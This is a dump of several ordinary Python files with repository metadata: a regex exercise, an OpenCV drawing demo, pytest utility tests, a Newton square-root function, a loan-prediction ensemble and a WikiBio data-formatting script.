Python Fundamentals/Regular Expressions/More Exercise/Task02_02.py
IvanTodorovBG/SoftUni
7b667f6905d9f695ab1484efbb02b6715f6d569e
[ "MIT" ]
null
null
null
Python Fundamentals/Regular Expressions/More Exercise/Task02_02.py
IvanTodorovBG/SoftUni
7b667f6905d9f695ab1484efbb02b6715f6d569e
[ "MIT" ]
1
2021-12-04T12:30:57.000Z
2021-12-04T12:30:57.000Z
import re data = input() total_income = 0 while data != "end of shift": pattern_customer = r"\%(?P<customer>[A-Z][a-z]+)\%" customer = re.finditer(pattern_customer, data) is_customer = bool([c.group(0) for c in customer]) pattern_product = r"\<(?P<product>[0-9a-zA-Z\_]+)\>" product = re.finditer(pattern_product, data) is_product = bool([p.group(0) for p in product]) pattern_count = r"\|(?P<count>[0-9]+)\|" count = re.finditer(pattern_count, data) is_count = bool([cnt.group(0) for cnt in count]) pattern_price = r"(?P<price>[0-9]+\.?[0-9]+)\$" price = re.finditer(pattern_price, data) is_price = bool([pr.group(0) for pr in price]) if is_customer and is_product and is_count and is_price: customer_dict = {} for c in re.finditer(pattern_customer, data): customer_dict = c.groupdict() product_dict = {} for p in re.finditer(pattern_product, data): product_dict = p.groupdict() count_dict = {} for cnt in re.finditer(pattern_count, data): count_dict = cnt.groupdict() price_dict = {} for pr in re.finditer(pattern_price, data): price_dict = pr.groupdict() total_product_price = int(count_dict['count']) * float(price_dict['price']) total_income += total_product_price print(f"{customer_dict['customer']}: {product_dict['product']} - {total_product_price:.2f}") data = input() print(f"Total income: {total_income:.2f}")
31.791667
100
0.619921
import re data = input() total_income = 0 while data != "end of shift": pattern_customer = r"\%(?P<customer>[A-Z][a-z]+)\%" customer = re.finditer(pattern_customer, data) is_customer = bool([c.group(0) for c in customer]) pattern_product = r"\<(?P<product>[0-9a-zA-Z\_]+)\>" product = re.finditer(pattern_product, data) is_product = bool([p.group(0) for p in product]) pattern_count = r"\|(?P<count>[0-9]+)\|" count = re.finditer(pattern_count, data) is_count = bool([cnt.group(0) for cnt in count]) pattern_price = r"(?P<price>[0-9]+\.?[0-9]+)\$" price = re.finditer(pattern_price, data) is_price = bool([pr.group(0) for pr in price]) if is_customer and is_product and is_count and is_price: customer_dict = {} for c in re.finditer(pattern_customer, data): customer_dict = c.groupdict() product_dict = {} for p in re.finditer(pattern_product, data): product_dict = p.groupdict() count_dict = {} for cnt in re.finditer(pattern_count, data): count_dict = cnt.groupdict() price_dict = {} for pr in re.finditer(pattern_price, data): price_dict = pr.groupdict() total_product_price = int(count_dict['count']) * float(price_dict['price']) total_income += total_product_price print(f"{customer_dict['customer']}: {product_dict['product']} - {total_product_price:.2f}") data = input() print(f"Total income: {total_income:.2f}")
0
0
0
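Each iteration above only records a purchase when all four named-group patterns match the same line. Here is a made-up input line showing the shape those patterns expect; the sample text is for illustration only and is not taken from the exercise.

# Illustration with a hypothetical line; the four patterns are the ones used above.
import re

line = "%George%special offer<Croissant>|2|10.3$"
customer = re.search(r"\%(?P<customer>[A-Z][a-z]+)\%", line).group("customer")   # 'George'
product = re.search(r"\<(?P<product>[0-9a-zA-Z\_]+)\>", line).group("product")   # 'Croissant'
count = int(re.search(r"\|(?P<count>[0-9]+)\|", line).group("count"))            # 2
price = float(re.search(r"(?P<price>[0-9]+\.?[0-9]+)\$", line).group("price"))   # 10.3
print(f"{customer}: {product} - {count * price:.2f}")                            # George: Croissant - 20.60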
3655fbbcf0aa34a78e5e06dada0505806b450706
789
py
Python
drawShapes.py
Shubhra1906/OpenCV
dc2b3291562bab54506380c52ac74ecb06adb8d3
[ "MIT" ]
null
null
null
drawShapes.py
Shubhra1906/OpenCV
dc2b3291562bab54506380c52ac74ecb06adb8d3
[ "MIT" ]
null
null
null
drawShapes.py
Shubhra1906/OpenCV
dc2b3291562bab54506380c52ac74ecb06adb8d3
[ "MIT" ]
null
null
null
import cv2 as cv import numpy as np from matplotlib import pyplot as plt if __name__ == '__main__': drawShapes()
27.206897
71
0.567807
import cv2 as cv import numpy as np from matplotlib import pyplot as plt def drawShapes(): image = cv.imread('./img/sea.jpg') # img = np.zeros([600, 800, 3], np.uint8) # line image = cv.line(image, (40, 100), (255, 255), (0, 0, 255), 5) # Arrowed Line image = cv.arrowedLine(image, (0, 255), (500, 350), (0, 0, 255), 5) # Rectangle image = cv.rectangle(image, (400, 250), (750, 400), (0, 0, 255), 5) # Circle image = cv.circle(image, (550, 350), 150, (0, 0, 255), 5) # Text font = cv.FONT_HERSHEY_COMPLEX image = cv.putText(image, "OpenCV", (10, 500), font, 4, (0, 255, 0), 10, cv.LINE_AA) cv.imshow('Shapes', image) cv.waitKey() cv.destroyAllWindows() if __name__ == '__main__': drawShapes()
646
0
23
57b3acfb96da7afb637bdd2beedbb9da791d379a
3,352
py
Python
tests/test_util.py
willkg/francis
c727fa5eaa77662277f95fbf000f7afc71cbbed4
[ "MIT" ]
2
2018-07-26T07:18:54.000Z
2018-09-06T16:47:18.000Z
tests/test_util.py
willkg/francis
c727fa5eaa77662277f95fbf000f7afc71cbbed4
[ "MIT" ]
6
2016-07-22T15:09:18.000Z
2016-07-22T23:25:39.000Z
tests/test_util.py
willkg/francis
c727fa5eaa77662277f95fbf000f7afc71cbbed4
[ "MIT" ]
null
null
null
import datetime import pytest from francis.util import ( parse_date, parse_rc, prettytable, ) # FIXME: test multiple > 40 columns
29.928571
83
0.488962
import datetime import pytest from francis.util import ( parse_date, parse_rc, prettytable, ) class Test_parse_rc: def test_empty(self): assert parse_rc('') == {} def test_key_val(self): assert parse_rc('foo=bar') == {'foo': 'bar'} assert parse_rc('\n foo = bar ') == {'foo': 'bar'} def test_uppercase_key(self): assert parse_rc('FOO=bar') == {'foo': 'bar'} def test_multiple(self): assert parse_rc('foo=bar\nbaz=bat') == {'foo': 'bar', 'baz': 'bat'} def test_comments(self): assert parse_rc('# foo=bar') == {} assert parse_rc(' # foo=bar') == {} class Test_prettytable: def test_empty(self): assert prettytable(0, []) == '' assert prettytable(100, []) == '' def test_single_row(self): assert ( prettytable(100, [('a', 'b', 'c', 'd')]) == ( 'a b c d\n' '--- --- --- ---' ) ) def test_truncation(self): # Total width is under 50, so no changes get made assert ( prettytable(50, [ ('1', ('a' * 39) + 'b') ]) == '1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab\n' '--- ------------------------------------------' ) # Total width is > 50, so all the c are truncated assert ( prettytable(50, [ ('1', ('a' * 41) + 'b' + 'cccccc') ]) == '1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab*\n' '--- ---------------------------------------------' ) def test_numbers(self): # Total width is > 50, so all the c are truncated assert ( prettytable(50, [ (1, ('a' * 41) + 'b' + 'cccccc') ]) == '1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab*\n' '--- ---------------------------------------------' ) # FIXME: test multiple > 40 columns class Test_parse_date: @pytest.mark.parametrize('text', [ '2015-05-05', '2016-01-01' ]) def test_datestamps(self, text): assert parse_date(text).strftime('%Y-%m-%d') == text @pytest.mark.parametrize('text,expected', [ ('today', '2016-01-01'), ('tod', '2016-01-01'), ('tomorrow', '2016-01-02'), ('tom', '2016-01-02'), ]) def test_today_tomorrow(self, text, expected): # This grounds relative dates to January 1st which was a Friday start = datetime.datetime(2016, 1, 1, 0, 0, 0) assert parse_date(text, relative_to=start).strftime('%Y-%m-%d') == expected @pytest.mark.parametrize('text,expected', [ ('friday', '2016-01-01'), ('saturday', '2016-01-02'), ('sunday', '2016-01-03'), ('monday', '2016-01-04'), ('tuesday', '2016-01-05'), ('wednesday', '2016-01-06'), ('thursday', '2016-01-07'), ]) def test_day_of_week(self, text, expected): # This grounds relative dates to January 1st which was a Friday start = datetime.datetime(2016, 1, 1, 0, 0, 0) assert parse_date(text, relative_to=start).strftime('%Y-%m-%d') == expected def test_value_error(self): with pytest.raises(ValueError): parse_date('2016-06-40')
2,205
685
310
cd5c17b028d7e8b3a56676c62432707a97d11c80
247
py
Python
ML/newton.py
siriusctrl/UniPublic
9df7f8bb9d1209de2af8ac4b5f57ada38587ad50
[ "Apache-2.0" ]
8
2021-03-14T14:19:10.000Z
2021-07-13T12:35:26.000Z
ML/newton.py
Sirius-ctrl/UniPublic
9df7f8bb9d1209de2af8ac4b5f57ada38587ad50
[ "Apache-2.0" ]
2
2018-05-29T04:28:20.000Z
2018-06-09T04:55:19.000Z
ML/newton.py
Sirius-ctrl/UniPublic
9df7f8bb9d1209de2af8ac4b5f57ada38587ad50
[ "Apache-2.0" ]
4
2019-01-10T10:30:33.000Z
2019-05-30T09:33:20.000Z
import math
16.466667
43
0.493927
import math def newton(n, e): theta = n/2 error = 99999 count = 0 while(error > e): theta -= (theta**2 - n) / (2*theta) error = theta**2 - n count += 1 print("guess", count, "times") return theta
212
0
23
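newton(n, e) above is Newton's method on f(x) = x^2 - n: the update x - (x^2 - n)/(2x) simplifies to (x + n/x)/2, the Babylonian step, so for n > 0 it converges to sqrt(n), and the loop stops once x^2 - n drops to e or below. A short usage sketch, assuming ML/newton.py is importable as `newton`.

# Usage sketch (assumes `from newton import newton` resolves to the file above).
import math
from newton import newton

root = newton(2, 1e-10)                 # also prints how many iterations were needed
print(root)                             # ~1.4142135623...
assert abs(root - math.sqrt(2)) < 1e-6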
7eedddac8d7d9c1d55b9ac6e1b3b84147bbbd112
28
py
Python
storedisagg/example/__init__.py
mcsoini/storedisagg
3fa360234995cdee897122ea8d85bc8658229053
[ "MIT" ]
null
null
null
storedisagg/example/__init__.py
mcsoini/storedisagg
3fa360234995cdee897122ea8d85bc8658229053
[ "MIT" ]
null
null
null
storedisagg/example/__init__.py
mcsoini/storedisagg
3fa360234995cdee897122ea8d85bc8658229053
[ "MIT" ]
null
null
null
__all__ = ['example_data']
9.333333
26
0.678571
__all__ = ['example_data']
0
0
0
a39283f2f128ca0dec249a7d9063c5194c19d4e4
3,090
py
Python
loanPrediction3/src_old/ensemble.py
MayukhSobo/AnalyticsVidya_Contests
a21079f8d217a35e88e72e88233c7ef0b8dd348b
[ "BSD-3-Clause" ]
11
2017-09-22T08:12:04.000Z
2021-10-30T14:30:44.000Z
loanPrediction3/src_old/ensemble.py
Manish041997/AnalyticsVidya_Contests
a21079f8d217a35e88e72e88233c7ef0b8dd348b
[ "BSD-3-Clause" ]
null
null
null
loanPrediction3/src_old/ensemble.py
Manish041997/AnalyticsVidya_Contests
a21079f8d217a35e88e72e88233c7ef0b8dd348b
[ "BSD-3-Clause" ]
5
2017-10-03T12:09:11.000Z
2019-08-03T14:05:47.000Z
from xgboost.sklearn import XGBClassifier # from xgb_model import xgb_model_fit # from sklearn.grid_search import GridSearchCV from sklearn.ensemble import VotingClassifier from sklearn.metrics import accuracy_score import pandas as pd from sklearn.model_selection import train_test_split import numpy as np from sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier print('\n\n') dtrain = pd.read_csv('../data/cleaned_train_v2.csv').iloc[:, 1:] dtest = pd.read_csv('../data/cleaned_test_v2.csv').iloc[:, 1:] # print(dtrain) loan_ids = dtest.Loan_ID dtest = dtest.iloc[:, 1:] features = np.array(dtrain.iloc[:, 0:-1]) labels = np.array(dtrain.Loan_Status) test = np.array(dtest) # print(features.shape) # Classifier 1 - XGBoost clf1 = XGBClassifier(learning_rate=0.1, n_estimators=1000, max_depth=3, min_child_weight=1, gamma=0.2, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, reg_alpha=69, seed=42) # Classifier 2 - Random Forest clf2 = RandomForestClassifier(bootstrap=True, criterion='gini', max_depth=3, oob_score=True, max_features=3, min_samples_leaf=10, min_samples_split=10, random_state=42, n_jobs=-1) # X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.40, random_state=42) tree = DecisionTreeClassifier(criterion='gini', max_depth=3) clf3 = AdaBoostClassifier(base_estimator=tree, n_estimators=3000, learning_rate=0.03, random_state=42) eclf = VotingClassifier(estimators=[ ('forest', clf2), ('xgboost', clf1), ('adaboost', clf3)], voting='hard') eclf.fit(features, labels) pred = eclf.predict(test) # print(accuracy_score(y_test, pred)) # print("Random Forest Classifier.....") # clf2.fit(X_train, y_train) # pred1 = clf2.predict(X_test) # print(accuracy_score(y_test, pred1)) # print('\nXGBoost Classifier......') # clf1.fit(X_train, y_train) # pred2 = clf1.predict(X_test) # print(accuracy_score(y_test, pred2)) # clf1.fit(features, labels, eval_metric='error') # pred = clf1.predict(test) # print(pred) submission = pd.DataFrame({'Loan_ID': loan_ids, 'Loan_Status': pred}) submission['Loan_Status'] = submission.Loan_Status.map({0: 'N', 1: 'Y'}) submission.to_csv('submission2.csv', index=False) # xgb_model_fit(clf1, features, labels, folds=3) # Classifier 2 - Random Forest # Tuning ```max_depth``` and ```min_child_weight``` # param_dist = { # "max_depth": list(range(1, 8, 2)), # "max_features": list(range(1, 10, 2)), # "min_samples_split": list(range(2, 11, 2)), # "min_samples_leaf": list(range(2, 11, 2)), # "bootstrap": [True, False], # "criterion": ["gini", "entropy"] # } # gs1 = GridSearchCV(estimator=clf2, # param_grid=param_dist, # scoring='accuracy', # n_jobs=-1, # iid=False, # cv=7, # verbose=5) # gs1.fit(features, labels) # # bootstrap=True, criterion=gini, max_depth=3, max_features=3, min_samples_leaf=10, min_samples_split=10, score=0.870588 # # # print(gs1.grid_scores_) # print(gs1.best_params_) # print(gs1.best_score_)
27.589286
122
0.733333
from xgboost.sklearn import XGBClassifier # from xgb_model import xgb_model_fit # from sklearn.grid_search import GridSearchCV from sklearn.ensemble import VotingClassifier from sklearn.metrics import accuracy_score import pandas as pd from sklearn.model_selection import train_test_split import numpy as np from sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier print('\n\n') dtrain = pd.read_csv('../data/cleaned_train_v2.csv').iloc[:, 1:] dtest = pd.read_csv('../data/cleaned_test_v2.csv').iloc[:, 1:] # print(dtrain) loan_ids = dtest.Loan_ID dtest = dtest.iloc[:, 1:] features = np.array(dtrain.iloc[:, 0:-1]) labels = np.array(dtrain.Loan_Status) test = np.array(dtest) # print(features.shape) # Classifier 1 - XGBoost clf1 = XGBClassifier(learning_rate=0.1, n_estimators=1000, max_depth=3, min_child_weight=1, gamma=0.2, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, reg_alpha=69, seed=42) # Classifier 2 - Random Forest clf2 = RandomForestClassifier(bootstrap=True, criterion='gini', max_depth=3, oob_score=True, max_features=3, min_samples_leaf=10, min_samples_split=10, random_state=42, n_jobs=-1) # X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.40, random_state=42) tree = DecisionTreeClassifier(criterion='gini', max_depth=3) clf3 = AdaBoostClassifier(base_estimator=tree, n_estimators=3000, learning_rate=0.03, random_state=42) eclf = VotingClassifier(estimators=[ ('forest', clf2), ('xgboost', clf1), ('adaboost', clf3)], voting='hard') eclf.fit(features, labels) pred = eclf.predict(test) # print(accuracy_score(y_test, pred)) # print("Random Forest Classifier.....") # clf2.fit(X_train, y_train) # pred1 = clf2.predict(X_test) # print(accuracy_score(y_test, pred1)) # print('\nXGBoost Classifier......') # clf1.fit(X_train, y_train) # pred2 = clf1.predict(X_test) # print(accuracy_score(y_test, pred2)) # clf1.fit(features, labels, eval_metric='error') # pred = clf1.predict(test) # print(pred) submission = pd.DataFrame({'Loan_ID': loan_ids, 'Loan_Status': pred}) submission['Loan_Status'] = submission.Loan_Status.map({0: 'N', 1: 'Y'}) submission.to_csv('submission2.csv', index=False) # xgb_model_fit(clf1, features, labels, folds=3) # Classifier 2 - Random Forest # Tuning ```max_depth``` and ```min_child_weight``` # param_dist = { # "max_depth": list(range(1, 8, 2)), # "max_features": list(range(1, 10, 2)), # "min_samples_split": list(range(2, 11, 2)), # "min_samples_leaf": list(range(2, 11, 2)), # "bootstrap": [True, False], # "criterion": ["gini", "entropy"] # } # gs1 = GridSearchCV(estimator=clf2, # param_grid=param_dist, # scoring='accuracy', # n_jobs=-1, # iid=False, # cv=7, # verbose=5) # gs1.fit(features, labels) # # bootstrap=True, criterion=gini, max_depth=3, max_features=3, min_samples_leaf=10, min_samples_split=10, score=0.870588 # # # print(gs1.grid_scores_) # print(gs1.best_params_) # print(gs1.best_score_)
0
0
0
442885ee6cfa521582e9f66dbef3c77656fe3fce
11,656
py
Python
data/format_wikibio.py
KaijuML/dtt-multi-branch
a49850a95034e58d387b9d48c647cfc2b83c45b5
[ "Apache-2.0" ]
8
2021-02-25T08:19:55.000Z
2022-03-12T06:25:36.000Z
data/format_wikibio.py
KaijuML/dtt-multi-branch
a49850a95034e58d387b9d48c647cfc2b83c45b5
[ "Apache-2.0" ]
5
2021-05-20T19:11:58.000Z
2021-07-14T07:46:33.000Z
data/format_wikibio.py
KaijuML/dtt-multi-branch
a49850a95034e58d387b9d48c647cfc2b83c45b5
[ "Apache-2.0" ]
null
null
null
from utils import nwise import pkg_resources import re, time, os import itertools import argparse import numpy import json DELIM = u"│" # delim used by onmt def split_infobox(dataset_folder, destination_folder): """ extract box content, field type and position information from infoboxes from original_data *.box.val is the box content (token) *.box.lab is the field type for each token *.box.pos is the position counted from the begining of a field """ bwfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.val") for setname in ['train', 'valid', 'test']] bffile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.lab") for setname in ['train', 'valid', 'test']] bpfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.pos") for setname in ['train', 'valid', 'test']] mixb_word, mixb_label, mixb_pos = [], [], [] for setname in ['train', 'valid', 'test']: fboxes = os.path.join(dataset_folder, 'raw', setname, f"{setname}.box") with open(fboxes, mode="r", encoding="utf8") as f: box = [line.strip() for line in f if line.strip()] box_word, box_label, box_pos = [], [], [] for ib in box: item = ib.split('\t') box_single_word, box_single_label, box_single_pos = [], [], [] for it in item: if len(it.split(':')) > 2: continue # print it prefix, word = it.split(':') if '<none>' in word or word.strip() == '' or prefix.strip() == '': continue new_label = re.sub("_[1-9]\d*$", "", prefix) if new_label.strip() == "": continue box_single_word.append(word) box_single_label.append(new_label) if re.search("_[1-9]\d*$", prefix): field_id = int(prefix.split('_')[-1]) box_single_pos.append(field_id if field_id <= 30 else 30) else: box_single_pos.append(1) box_word.append(box_single_word) box_label.append(box_single_label) box_pos.append(box_single_pos) mixb_word.append(box_word) mixb_label.append(box_label) mixb_pos.append(box_pos) print(f'{setname} done') for k, m in enumerate(mixb_word): with open(bwfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_label): with open(bffile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_pos): with open(bpfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') def create_tables(folder): """Here we create the tables.jl files used in PARENT metric We could optimize the code so that step is done in create_input but it's easier and more convienient to just add it there. """ for setname in ['train', 'valid', 'test']: input_filename = os.path.join(folder, 'full', f"{setname}_input.txt") with open(input_filename, mode="r", encoding="utf8") as f: # each line is a table. Each token is a value in the table. 
# We take the value/label of the token and discard the pos # given that they are written in the right order allvals = list() alllabs = list() for line in f: vals = list() labs = list() for token in line.strip().split(): val, lab, _, __ = token.split(DELIM) vals.append(val) labs.append(lab) allvals.append(vals) alllabs.append(labs) tables = list() for idx, (vals, labs) in enumerate(zip(allvals, alllabs)): table = list() for key, group in itertools.groupby(labs): size = len([_ for _ in group]) vvals, vals = vals[:size], vals[size:] table.append((key, vvals)) assert len(vals) == 0 # we exhausted all tokens tables.append(table) output_filename = os.path.join(folder, 'full', f"{setname}_tables.jl") with open(output_filename, mode="w", encoding="utf8") as f: for table in tables: f.write(json.dumps(table) + '\n') def preprocess(dataset_folder, destination_folder, args): """ We use a triple <f, p+, p-> to represent the field information of a token in the specific field. p+&p- are the position of the token in that field counted from the begining and the end of the field. For example, for a field (birthname, Jurgis Mikelatitis) in an infobox, we represent the field as (Jurgis, <birthname, 1, 2>) & (Mikelatitis, <birthname, 2, 1>) """ print("extracting token, field type and position info from original data ...") time_start = time.time() split_infobox(dataset_folder, destination_folder) reverse_pos(destination_folder) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("merging everything into single input file ...") time_start = time.time() create_input(destination_folder) duration = time.time() - time_start print(f"merge finished in {duration:.3f} seconds") print("extracting first sentences from original data ...") time_start = time.time() extract_sentences(dataset_folder, destination_folder, args.first_sentence) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("formatting input in human readable format ...") time_start = time.time() create_tables(destination_folder) duration = time.time() - time_start print(f"formatting finished in {duration:.3f} seconds") if __name__ == '__main__': dataset_folder = pkg_resources.resource_filename(__name__, 'wikibio') parser = argparse.ArgumentParser() group = parser.add_argument_group('Destination path') group.add_argument('--dest', '-d', dest='dest', default=dataset_folder, help='Folder where to store the resulting files') parser.add_argument('--first_sentence', action='store_true', help="Activate to keep only the first sentence") main(parser.parse_args())
41.187279
105
0.573267
from utils import nwise import pkg_resources import re, time, os import itertools import argparse import numpy import json DELIM = u"│" # delim used by onmt def split_infobox(dataset_folder, destination_folder): """ extract box content, field type and position information from infoboxes from original_data *.box.val is the box content (token) *.box.lab is the field type for each token *.box.pos is the position counted from the begining of a field """ bwfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.val") for setname in ['train', 'valid', 'test']] bffile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.lab") for setname in ['train', 'valid', 'test']] bpfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.pos") for setname in ['train', 'valid', 'test']] mixb_word, mixb_label, mixb_pos = [], [], [] for setname in ['train', 'valid', 'test']: fboxes = os.path.join(dataset_folder, 'raw', setname, f"{setname}.box") with open(fboxes, mode="r", encoding="utf8") as f: box = [line.strip() for line in f if line.strip()] box_word, box_label, box_pos = [], [], [] for ib in box: item = ib.split('\t') box_single_word, box_single_label, box_single_pos = [], [], [] for it in item: if len(it.split(':')) > 2: continue # print it prefix, word = it.split(':') if '<none>' in word or word.strip() == '' or prefix.strip() == '': continue new_label = re.sub("_[1-9]\d*$", "", prefix) if new_label.strip() == "": continue box_single_word.append(word) box_single_label.append(new_label) if re.search("_[1-9]\d*$", prefix): field_id = int(prefix.split('_')[-1]) box_single_pos.append(field_id if field_id <= 30 else 30) else: box_single_pos.append(1) box_word.append(box_single_word) box_label.append(box_single_label) box_pos.append(box_single_pos) mixb_word.append(box_word) mixb_label.append(box_label) mixb_pos.append(box_pos) print(f'{setname} done') for k, m in enumerate(mixb_word): with open(bwfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_label): with open(bffile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_pos): with open(bpfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') def reverse_pos(folder): # get the position counted from the end of a field bpfile = [os.path.join(folder, 'processed_data', setname, f"{setname}.box.pos") for setname in ['train', 'valid', 'test']] bwfile = [os.path.join(folder, 'processed_data', setname, f"{setname}.box.rpos") for setname in ['train', 'valid', 'test']] for k, pos in enumerate(bpfile): box = open(pos, "r").read().strip().split('\n') reverse_pos = [] for bb in box: pos = bb.split() tmp_pos = [] single_pos = [] for p in pos: if int(p) == 1 and len(tmp_pos) != 0: single_pos.extend(tmp_pos[::-1]) tmp_pos = [] tmp_pos.append(p) single_pos.extend(tmp_pos[::-1]) reverse_pos.append(single_pos) with open(bwfile[k], 'w+') as bw: for item in reverse_pos: bw.write(" ".join(item) + '\n') def create_input(folder): for setname in ["train", "valid", "test"]: valfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.val") labfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.lab") posfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.pos") rposfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.rpos") with open(valfilename, 
mode='r', encoding='utf8') as valfile: vals = [line.strip() for line in valfile if line.strip()] with open(labfilename, mode='r', encoding='utf8') as labfile: labs = [line.strip() for line in labfile if line.strip()] with open(posfilename, mode='r', encoding='utf8') as posfile: poss = [line.strip() for line in posfile if line.strip()] with open(rposfilename, mode='r', encoding='utf8') as rposfile: rposs = [line.strip() for line in rposfile if line.strip()] assert len(vals) == len(labs) == len(poss) == len(rposs) input = list() for idx, (val, lab, pos, rpos) in enumerate(zip(vals, labs, poss, rposs)): vval = val.strip().split(' ') llab = lab.strip().split(' ') ppos = pos.strip().split(' ') rrpos = rpos.strip().split(' ') if not len(vval) == len(llab) == len(ppos) == len(rrpos): print(f"error at step {idx}:", len(vval), len(llab), len(ppos), len(rrpos)) raise RuntimeError input.append( ' '.join([re.sub('\s', '~', DELIM.join(tup)) for tup in zip(vval, llab, ppos, rrpos)]) ) input_filename = os.path.join(folder, 'full', f"{setname}_input.txt") with open(input_filename, mode="w", encoding="utf8") as f: for i in input: f.write(i + "\n") print(f'{setname} done.') def extract_sentences(dataset_folder, destination_folder, only_first=True): for setname in ['train', 'valid', 'test']: inputnb_filename = os.path.join(dataset_folder, 'raw', setname, f"{setname}.nb") inputsent_filename = os.path.join(dataset_folder, 'raw', setname, f"{setname}.sent") output_filename = os.path.join(destination_folder, 'full', f"{setname}_output.txt") nb = [0] with open(inputnb_filename, encoding='utf8', mode='r') as f: # Here we get the indices of the first sentence for each instance # The file .sent contains one sentence per line but instances have # more than one sentence each. (number is variable) for idx, line in enumerate(f): nb += [int(line.strip())] indices = numpy.cumsum(nb[:-1]) sentences = list() with open(inputsent_filename, encoding='utf8', mode='r') as f: for idx, line in enumerate(f): sentences += [line.strip()] if only_first: with open(output_filename, mode='w', encoding='utf8') as f: for idx in indices: f.write(sentences[idx] + '\n') else: with open(output_filename, mode='w', encoding='utf8') as f: for start, end in nwise(indices, n=2): f.write(' '.join(sentences[start:end]) + '\n') def create_tables(folder): """Here we create the tables.jl files used in PARENT metric We could optimize the code so that step is done in create_input but it's easier and more convienient to just add it there. """ for setname in ['train', 'valid', 'test']: input_filename = os.path.join(folder, 'full', f"{setname}_input.txt") with open(input_filename, mode="r", encoding="utf8") as f: # each line is a table. Each token is a value in the table. 
# We take the value/label of the token and discard the pos # given that they are written in the right order allvals = list() alllabs = list() for line in f: vals = list() labs = list() for token in line.strip().split(): val, lab, _, __ = token.split(DELIM) vals.append(val) labs.append(lab) allvals.append(vals) alllabs.append(labs) tables = list() for idx, (vals, labs) in enumerate(zip(allvals, alllabs)): table = list() for key, group in itertools.groupby(labs): size = len([_ for _ in group]) vvals, vals = vals[:size], vals[size:] table.append((key, vvals)) assert len(vals) == 0 # we exhausted all tokens tables.append(table) output_filename = os.path.join(folder, 'full', f"{setname}_tables.jl") with open(output_filename, mode="w", encoding="utf8") as f: for table in tables: f.write(json.dumps(table) + '\n') def preprocess(dataset_folder, destination_folder, args): """ We use a triple <f, p+, p-> to represent the field information of a token in the specific field. p+&p- are the position of the token in that field counted from the begining and the end of the field. For example, for a field (birthname, Jurgis Mikelatitis) in an infobox, we represent the field as (Jurgis, <birthname, 1, 2>) & (Mikelatitis, <birthname, 2, 1>) """ print("extracting token, field type and position info from original data ...") time_start = time.time() split_infobox(dataset_folder, destination_folder) reverse_pos(destination_folder) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("merging everything into single input file ...") time_start = time.time() create_input(destination_folder) duration = time.time() - time_start print(f"merge finished in {duration:.3f} seconds") print("extracting first sentences from original data ...") time_start = time.time() extract_sentences(dataset_folder, destination_folder, args.first_sentence) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("formatting input in human readable format ...") time_start = time.time() create_tables(destination_folder) duration = time.time() - time_start print(f"formatting finished in {duration:.3f} seconds") def make_dirs(folder): if not os.path.exists(folder): os.mkdir(folder) os.mkdir(os.path.join(folder, 'full')) os.mkdir(os.path.join(folder, "processed_data/")) os.mkdir(os.path.join(folder, "processed_data/train/")) os.mkdir(os.path.join(folder, "processed_data/test/")) os.mkdir(os.path.join(folder, "processed_data/valid/")) def main(args): make_dirs(args.dest) preprocess(dataset_folder, args.dest, args) if __name__ == '__main__': dataset_folder = pkg_resources.resource_filename(__name__, 'wikibio') parser = argparse.ArgumentParser() group = parser.add_argument_group('Destination path') group.add_argument('--dest', '-d', dest='dest', default=dataset_folder, help='Folder where to store the resulting files') parser.add_argument('--first_sentence', action='store_true', help="Activate to keep only the first sentence") main(parser.parse_args())
4,711
0
115
26cc0c3344909259086172abac7c8974633f63f8
6,039
py
Python
recalibration.py
DanielAndreasen/pymoog
1d4042705c5180a6e609d08e7455d3d893e86392
[ "MIT" ]
null
null
null
recalibration.py
DanielAndreasen/pymoog
1d4042705c5180a6e609d08e7455d3d893e86392
[ "MIT" ]
3
2015-01-31T15:36:38.000Z
2015-07-06T22:11:42.000Z
recalibration.py
DanielAndreasen/pymoog
1d4042705c5180a6e609d08e7455d3d893e86392
[ "MIT" ]
null
null
null
